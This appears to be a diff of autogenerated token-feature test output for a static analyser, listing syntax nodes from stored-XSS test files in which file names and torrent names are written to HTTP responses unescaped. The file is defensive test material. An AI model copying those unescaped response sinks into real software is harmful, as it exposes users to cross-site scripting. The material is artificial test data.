    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | exceptional return of files2.push(file) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | exceptional return of files2.push(file) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | files2.push(file) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | files2.push(file) | contextSurroundingFunctionParameters | (req, res)\n(error, files1)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | files2.push(file) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | files2.push(file) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | files2.push(file) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:20:31:23 | push | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:20:31:23 | push | contextSurroundingFunctionParameters | (req, res)\n(error, files1)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:20:31:23 | push | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:20:31:23 | push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:20:31:23 | push | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:25:31:28 | file | CalleeFlexibleAccessPath | files2.push | | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:25:31:28 | file | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:25:31:28 | file | contextFunctionInterfaces | format(files2) | @@ -22484,6 +149293,31 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:25:31:28 | file | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:25:31:28 | file | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:25:31:28 | file | receiverName | files2 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:11 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:11 | res | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:11 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:11 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:11 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:17 | res.write | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:17 | res.write | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:17 | res.write | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:17 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:17 | res.write | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | exceptional return of res.write(files2) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | exceptional return of res.write(files2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | exceptional return of res.write(files2) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | exceptional return of res.write(files2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | exceptional return of res.write(files2) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | res.write(files2) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | res.write(files2) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | res.write(files2) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | res.write(files2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:9:33:25 | res.write(files2) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:13:33:17 | write | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:13:33:17 | write | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:13:33:17 | write | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:13:33:17 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:33:13:33:17 | write | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:33:19:33:24 | files2 | CalleeFlexibleAccessPath | res.write | | autogenerated/Xss/StoredXss/xss-through-filenames.js:33:19:33:24 | files2 | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:33:19:33:24 | files2 | contextFunctionInterfaces | format(files2) | @@ -22492,6 +149326,68 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:33:19:33:24 | files2 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:33:19:33:24 | files2 | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:33:19:33:24 | files2 | receiverName | res | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:18 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:18 | files3 | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:18 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:18 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:18 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 ... files2) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 ... files2) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 ... files2) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 ... files2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 ... files2) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:27 | format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:27 | format | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:27 | format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:27 | format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:27 | format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | exceptional return of format(files2) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | exceptional return of format(files2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | exceptional return of format(files2) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | exceptional return of format(files2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | exceptional return of format(files2) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | CalleeFlexibleAccessPath | format | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | InputArgumentIndex | 0 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:11 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:11 | res | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:11 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:11 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:11 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:17 | res.write | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:17 | res.write | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:17 | res.write | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:17 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:17 | res.write | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | exceptional return of res.write(files3) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | exceptional return of res.write(files3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | exceptional return of res.write(files3) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | exceptional return of res.write(files3) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | exceptional return of res.write(files3) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | res.write(files3) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | res.write(files3) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | res.write(files3) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | res.write(files3) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:9:37:25 | res.write(files3) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:13:37:17 | write | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:13:37:17 | write | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:13:37:17 | write | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:13:37:17 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:37:13:37:17 | write | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:37:19:37:24 | files3 | CalleeFlexibleAccessPath | res.write | | autogenerated/Xss/StoredXss/xss-through-filenames.js:37:19:37:24 | files3 | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:37:19:37:24 | files3 | contextFunctionInterfaces | format(files2) | @@ -22500,30 +149396,167 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:37:19:37:24 | files3 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:37:19:37:24 | files3 | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:37:19:37:24 | files3 | receiverName | res | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:0 | this | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:1 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:1 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:1 | parseTorrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:1:1:1 | require | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:18 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:18 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:18 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:18 | parseTorrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:45 | parseTo ... rrent') | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:45 | parseTo ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:45 | parseTo ... rrent') | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:45 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:45 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:7:1:45 | parseTorrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:28 | require | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:28 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:28 | require | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:45 | exceptional return of require ... rrent') | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:45 | exceptional return of require ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:45 | exceptional return of require ... rrent') | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:45 | require ... rrent') | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:45 | require ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:1:22:1:45 | require ... rrent') | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:1:30:1:44 | 'parse-torrent' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/StoredXss/xss-through-torrent.js:1:30:1:44 | 'parse-torrent' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-torrent.js:1:30:1:44 | 'parse-torrent' | calleeImports | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:1:30:1:44 | 'parse-torrent' | contextFunctionInterfaces | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:1:30:1:44 | 'parse-torrent' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:1:30:1:44 | 'parse-torrent' | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:13 | express | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:13 | express | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:34 | express | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:34 | express | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:34 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:34 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:7:2:34 | express ... press') | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:23 | require | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:23 | require | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:34 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:34 | exceptional return of require('express') | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:34 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:2:17:2:34 | require('express') | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:2:25:2:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/StoredXss/xss-through-torrent.js:2:25:2:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-torrent.js:2:25:2:33 | 'express' | calleeImports | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:2:25:2:33 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:2:25:2:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:2:25:2:33 | 'express' | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:7 | express | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:7 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:7 | express | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:9 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:9 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:9 | exceptional return of express() | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:9 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:9 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:9 | express() | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:13 | express().get | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:13 | express().get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:4:13 | express().get | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:8:2 | exceptional return of express ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:8:2 | exceptional return of express ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:8:2 | exceptional return of express ... T OK\\n}) | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:8:2 | express ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:8:2 | express ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:1:8:2 | express ... T OK\\n}) | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:11:4:13 | get | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:11:4:13 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:11:4:13 | get | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:15:4:25 | '/user/:id' | CalleeFlexibleAccessPath | express().get | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:15:4:25 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:15:4:25 | '/user/:id' | calleeImports | express | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:15:4:25 | '/user/:id' | contextFunctionInterfaces | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:15:4:25 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:15:4:25 | '/user/:id' | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | parseTorrent | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | parseTorrent | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | parseTorrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | this | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | this | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | this | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:4:27 | this | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | 'arguments' object of anonymous function | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | 